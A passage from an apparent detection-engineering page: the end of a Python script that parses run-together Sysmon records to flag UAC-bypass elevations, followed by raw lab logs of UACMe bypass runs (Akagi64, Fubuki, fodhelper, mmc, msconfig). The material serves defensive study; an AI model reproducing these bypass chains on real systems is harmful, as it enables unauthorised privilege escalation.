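    (?P<ParentTail>.*)$                                 # ParentCommandLine + ParentUser, no delimiter
""", re.VERBOSE)
RECORD_START = re.compile(r"\s*(?=154100x8000000000000000\d+Microsoft-Windows-Sysmon/Operational)")
# Heuristic: CurrentDirectory is the last drive-rooted path ending in '\' before the User field.
CURDIR = re.compile(r"[A-Z]:\\[^\":]*\\$")
ELEVATED = {"High", "System"}


def parse_records(text):
    """Split a run-together export on the record prefix and parse every record."""
    events = []
    for chunk in RECORD_START.split(text.strip()):
        if not chunk:
            continue
        m = RECORD.match(chunk)
        if m is None:
            raise ValueError("unparseable record: " + chunk[:80])
        e = m.groupdict()
        e["Computer"] = e["Computer"].rstrip("-")      # assumption: export glued Computer and UtcTime with '-'
        for k in ("ProcessId", "ParentProcessId", "TerminalSessionId"):
            e[k] = int(e[k])
        e["Hashes"] = dict(kv.split("=", 1) for kv in e["Hashes"].split(","))
        cd = CURDIR.search(e["Middle"])
        e["CurrentDirectory"] = cd.group(0) if cd else None
        events.append(e)
    # ParentCommandLine runs straight into ParentUser (msconfig.exe's parent line reads
    # "cmd.exeATTACKBOX-WIN10\VICTIM"), so only split on user names already seen in User.
    users = sorted({e["User"] for e in events} | {r"NT AUTHORITY\SYSTEM"}, key=len, reverse=True)
    for e in events:
        tail = e.pop("ParentTail")
        user = next((u for u in users if tail.endswith(u)), None)
        e["ParentUser"] = user
        e["ParentCommandLine"] = tail[:-len(user)] if user else tail
    return events


def find_elevations(events):
    """Return children at High/System whose recorded parent ran at Medium/Low.

    A user-approved elevation leaves the same edge, because the elevated process is
    created with the requesting process as its parent, so the parent's image path and
    working directory are reported: a parent under the user's Temp folder or outside
    the Windows directory is what separates the UACMe runs from a clicked-through prompt."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in sorted(events, key=lambda x: x["UtcTime"]):
        parent = by_guid.get(e["ParentProcessGuid"])
        if e["IntegrityLevel"] not in ELEVATED or parent is None:
            continue
        if parent["IntegrityLevel"] in ELEVATED:
            continue
        alerts.append({
            "utc": e["UtcTime"],
            "child": e["Image"], "child_il": e["IntegrityLevel"], "child_logon": e["LogonId"],
            "parent": parent["Image"], "parent_il": parent["IntegrityLevel"],
            "parent_logon": parent["LogonId"], "parent_curdir": parent["CurrentDirectory"],
            "parent_outside_windows": not parent["Image"].lower().startswith("c:\\windows\\"),
        })
    return alerts


# Four records copied from this export (the UACMe method-56 chain), joined with a
# space the way the export runs them together; listed here in chronological order.
SAMPLE_EXPORT = " ".join([
    r'154100x8000000000000000680904Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:02.282{51A89197-C7BE-6552-4E03-000000001E00}7864C:\DetectionTesting\Temp\ExternalPayloads\uacme\56 Akagi64.exe3.2.7.2009UACMe main moduleUACMeHazardous EnvironmentsAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=44E57A07C951D4449214E1992BCD3098625436A1,MD5=28C77E9A44630FF42EBE8C4068B5E42C,SHA256=E6BC9A37CE3F74393F6B1E85134C021B777E0D6A4F947410D23FE343CF7A9C97,IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38{51A89197-C7BE-6552-4C03-000000001E00}708C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM',
    r'154100x8000000000000000681269Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.012{51A89197-C7BF-6552-5103-000000001E00}5704C:\Windows\System32\osk.exe10.0.17134.376 (WinBuild.160101.0800)Accessibility On-Screen KeyboardMicrosoft® Windows® Operating SystemMicrosoft Corporationosk.exe"C:\Windows\system32\osk.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961HighSHA1=05039ED9DBFB513A18649D946FEA67EC1715DF58,MD5=FAF01C3C0E977AA81B925B1B81C8919B,SHA256=F855FFB4F49EFE66EFCDF28E0710637FE34E7A89E38A9493C88153220CD873AD,IMPHASH=701A7B99D329B6D4E6B9C4CB9292D8A5{51A89197-C7BE-6552-4E03-000000001E00}7864C:\DetectionTesting\Temp\ExternalPayloads\uacme\56 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM',
    r'154100x8000000000000000681276Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.023{51A89197-C7BF-6552-5203-000000001E00}5524C:\Users\VICTIM\AppData\Local\Temp\Fubuki.exe3.2.7.2009UACMe proxy DLLUACMeHazardous EnvironmentsFubuki.dllC:\Windows\system32\cmd.exeC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1E23B9CA65D71EAAB996A39FCB56B71A3FDE7916,MD5=FC76F6830FBCE341E549994DC1EDC47B,SHA256=ECF8C3C8F85B39A03250BF0D8EB022159397C7EE4752019FD1F60B94164305BF,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847{51A89197-C7BE-6552-4E03-000000001E00}7864C:\DetectionTesting\Temp\ExternalPayloads\uacme\56 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM',
    r'154100x8000000000000000681684Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.449{51A89197-C7BF-6552-5703-000000001E00}1616C:\Windows\System32\msconfig.exe10.0.17134.1 (WinBuild.160101.0800)System Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationmsconfig.EXE"C:\Windows\system32\msconfig.exe" -5C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=E8FFF9E605F287BFF3110A777DAF66B11C48E1BE,MD5=75753F256D22B6DC6BCEC1528E8C87C1,SHA256=12DA9E2CD5E7CAC990EA2C2E0A0FFE9D4A963CCD05986330D7DC57E68C19374E,IMPHASH=B9ED4A93C60CF189167E373CF6AFD577{51A89197-C7BF-6552-5203-000000001E00}5524C:\Users\VICTIM\AppData\Local\Temp\Fubuki.exeC:\Windows\system32\cmd.exeATTACKBOX-WIN10\VICTIM',
])

if __name__ == "__main__":
    for a in find_elevations(parse_records(SAMPLE_EXPORT)):
        print(f'{a["utc"]} {a["parent_il"]}->{a["child_il"]} {a["parent"]} -> {a["child"]} '
              f'(logon {a["parent_logon"]}->{a["child_logon"]}, parent cwd {a["parent_curdir"]})')
```

Run stand-alone it prints two edges: osk.exe at High under 56 Akagi64.exe (Medium), and msconfig.exe -5 at High under Fubuki.exe (Medium, running from the user's Temp folder); both parents sit outside the Windows directory, and msconfig.exe carries a different LogonId (0x1d856) from its parent (0x1d896), the way an elevated linked token shows up in these records. Fed the whole export, the same rule fires on the other chains this page records: wusa.exe 7088 at High under powershell.exe 2756 (WinPwn, -technique magic), ComputerDefaults.exe 6008 under 59 Akagi64.exe and slui.exe 5260 under 61 Akagi64.exe, while the Medium-integrity osk.exe 3720 and msconfig.exe 4332 launches are left alone. The parser only exists because this page shows the XML fields run together; a Sysmon feed that still carries its field boundaries needs none of the regex heuristics above.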
154100x8000000000000000681336Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.149{51A89197-C7BF-6552-5303-000000001E00}4332C:\Windows\System32\msconfig.exe10.0.17134.1 (WinBuild.160101.0800)System Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationmsconfig.EXE"C:\Windows\system32\msconfig.exe" -5C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=E8FFF9E605F287BFF3110A777DAF66B11C48E1BE,MD5=75753F256D22B6DC6BCEC1528E8C87C1,SHA256=12DA9E2CD5E7CAC990EA2C2E0A0FFE9D4A963CCD05986330D7DC57E68C19374E,IMPHASH=B9ED4A93C60CF189167E373CF6AFD577{51A89197-C7BF-6552-5203-000000001E00}5524C:\Users\VICTIM\AppData\Local\Temp\Fubuki.exeC:\Windows\system32\cmd.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000681276Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.023{51A89197-C7BF-6552-5203-000000001E00}5524C:\Users\VICTIM\AppData\Local\Temp\Fubuki.exe3.2.7.2009UACMe proxy DLLUACMeHazardous EnvironmentsFubuki.dllC:\Windows\system32\cmd.exeC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1E23B9CA65D71EAAB996A39FCB56B71A3FDE7916,MD5=FC76F6830FBCE341E549994DC1EDC47B,SHA256=ECF8C3C8F85B39A03250BF0D8EB022159397C7EE4752019FD1F60B94164305BF,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847{51A89197-C7BE-6552-4E03-000000001E00}7864C:\DetectionTesting\Temp\ExternalPayloads\uacme\56 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000681269Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.012{51A89197-C7BF-6552-5103-000000001E00}5704C:\Windows\System32\osk.exe10.0.17134.376 (WinBuild.160101.0800)Accessibility On-Screen KeyboardMicrosoft® Windows® Operating SystemMicrosoft Corporationosk.exe"C:\Windows\system32\osk.exe" 
C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961HighSHA1=05039ED9DBFB513A18649D946FEA67EC1715DF58,MD5=FAF01C3C0E977AA81B925B1B81C8919B,SHA256=F855FFB4F49EFE66EFCDF28E0710637FE34E7A89E38A9493C88153220CD873AD,IMPHASH=701A7B99D329B6D4E6B9C4CB9292D8A5{51A89197-C7BE-6552-4E03-000000001E00}7864C:\DetectionTesting\Temp\ExternalPayloads\uacme\56 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000681027Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:02.848{51A89197-C7BE-6552-5003-000000001E00}5796C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 288 0000025DF1FE8040C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000681020Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:02.813{51A89197-C7BE-6552-4F03-000000001E00}3720C:\Windows\System32\osk.exe10.0.17134.376 (WinBuild.160101.0800)Accessibility On-Screen KeyboardMicrosoft® Windows® Operating SystemMicrosoft Corporationosk.exe"C:\Windows\system32\osk.exe" 
C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=05039ED9DBFB513A18649D946FEA67EC1715DF58,MD5=FAF01C3C0E977AA81B925B1B81C8919B,SHA256=F855FFB4F49EFE66EFCDF28E0710637FE34E7A89E38A9493C88153220CD873AD,IMPHASH=701A7B99D329B6D4E6B9C4CB9292D8A5{51A89197-C7BE-6552-4E03-000000001E00}7864C:\DetectionTesting\Temp\ExternalPayloads\uacme\56 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680904Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:02.282{51A89197-C7BE-6552-4E03-000000001E00}7864C:\DetectionTesting\Temp\ExternalPayloads\uacme\56 Akagi64.exe3.2.7.2009UACMe main moduleUACMeHazardous EnvironmentsAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=44E57A07C951D4449214E1992BCD3098625436A1,MD5=28C77E9A44630FF42EBE8C4068B5E42C,SHA256=E6BC9A37CE3F74393F6B1E85134C021B777E0D6A4F947410D23FE343CF7A9C97,IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38{51A89197-C7BE-6552-4C03-000000001E00}708C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680872Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:02.213{51A89197-C7BE-6552-4D03-000000001E00}5800C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 
-ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7BE-6552-4C03-000000001E00}708C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680865Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:02.201{51A89197-C7BE-6552-4C03-000000001E00}708C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680643Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:58.095{51A89197-C7BA-6552-4B03-000000001E00}4164C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 
-ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7BA-6552-4A03-000000001E00}4168C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680636Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:58.076{51A89197-C7BA-6552-4A03-000000001E00}4168C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe"C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7BA-6552-4903-000000001E00}2508C:\Windows\System32\mmc.exehuy32,wf.msc "C:\Users\VICTIM\AppData\Local\Temp\kmkze.msc"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680590Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:58.006{51A89197-C7BA-6552-4903-000000001E00}2508C:\Windows\System32\mmc.exe10.0.17134.1 (WinBuild.160101.0800)Microsoft Management ConsoleMicrosoft® Windows® Operating SystemMicrosoft Corporationmmc.exehuy32,wf.msc "C:\Users\VICTIM\AppData\Local\Temp\kmkze.msc"C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=382008FBA9480F6568DB3E1F335D080192DE62CA,MD5=BA80301974CC8C4FB9F3F9DDB5905C30,SHA256=683C0CB518B3FE31CFFA7FCF79F5EFC18D355C6D52734757758ED26AE5950037,IMPHASH=A4839A4F4C2BB2C12AA47ACB52D27833{51A89197-C7B9-6552-4703-000000001E00}5608C:\DetectionTesting\Temp\ExternalPayloads\uacme\39 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\39 
Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680304Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:57.805{51A89197-C7B9-6552-4803-000000001E00}7812C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 400 0000025DF47D04A0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000680055Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:57.216{51A89197-C7B9-6552-4703-000000001E00}5608C:\DetectionTesting\Temp\ExternalPayloads\uacme\39 Akagi64.exe3.2.7.2009UACMe main moduleUACMeHazardous EnvironmentsAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B1A4DC7C2D51613F4C53906F5B27F7517FDB86F,MD5=26925E1EE4A8A7C0F91FA8BDB3CEA538,SHA256=8C3726E0F88A66E2E8844F4318EC0E4E46C1589EF50733E683E3050685BA3FDA,IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38{51A89197-C7B9-6552-4503-000000001E00}5668C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680021Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:57.147{51A89197-C7B9-6552-4603-000000001E00}2860C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 
-ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7B9-6552-4503-000000001E00}5668C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000680014Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:57.139{51A89197-C7B9-6552-4503-000000001E00}5668C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679841Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:56.512{51A89197-C7B8-6552-4403-000000001E00}5544C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 
-ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7B8-6552-4303-000000001E00}1564C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679827Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:56.479{51A89197-C7B8-6552-4303-000000001E00}1564C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7B8-6552-4203-000000001E00}2468C:\Windows\System32\fodhelper.exe"C:\Windows\system32\fodhelper.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679732Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:56.332{51A89197-C7B8-6552-4203-000000001E00}2468C:\Windows\System32\fodhelper.exe10.0.17134.1 (WinBuild.160101.0800)Features On Demand HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationFodHelper.EXE"C:\Windows\system32\fodhelper.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=84C1DE94E002DE58009973F5DD16241D286201A5,MD5=1D1F9E564472A9698F1BE3F9FEB9864B,SHA256=B52FBB99308493A27AAC725CF70721041CDEE61CACA19792B949CC0867A27964,IMPHASH=9B87653B0F199E556A5CCF9C623D328F{51A89197-C7B7-6552-3F03-000000001E00}7084C:\DetectionTesting\Temp\ExternalPayloads\uacme\34 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 
154100x8000000000000000679473Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:56.159{51A89197-C7B8-6552-4103-000000001E00}3948C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 324 0000025DF37D7600C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000679465Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:56.126{51A89197-C7B8-6552-4003-000000001E00}4252C:\Windows\System32\fodhelper.exe10.0.17134.1 (WinBuild.160101.0800)Features On Demand HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationFodHelper.EXE"C:\Windows\system32\fodhelper.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=84C1DE94E002DE58009973F5DD16241D286201A5,MD5=1D1F9E564472A9698F1BE3F9FEB9864B,SHA256=B52FBB99308493A27AAC725CF70721041CDEE61CACA19792B949CC0867A27964,IMPHASH=9B87653B0F199E556A5CCF9C623D328F{51A89197-C7B7-6552-3F03-000000001E00}7084C:\DetectionTesting\Temp\ExternalPayloads\uacme\34 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679332Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:55.564{51A89197-C7B7-6552-3F03-000000001E00}7084C:\DetectionTesting\Temp\ExternalPayloads\uacme\34 Akagi64.exe3.2.7.2009UACMe main moduleUACMeHazardous EnvironmentsAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 
Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=A18306D7AAF4F4AD0E463A44C27061596C65EFC2,MD5=356FD203060181072EF9DF355D09C73C,SHA256=A00B876D8512482A677015C83BB88C270D0E77DC19AE087CAF47CBA904D06C0D,IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38{51A89197-C7B7-6552-3D03-000000001E00}2852C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679300Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:55.494{51A89197-C7B7-6552-3E03-000000001E00}4980C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7B7-6552-3D03-000000001E00}2852C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679293Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 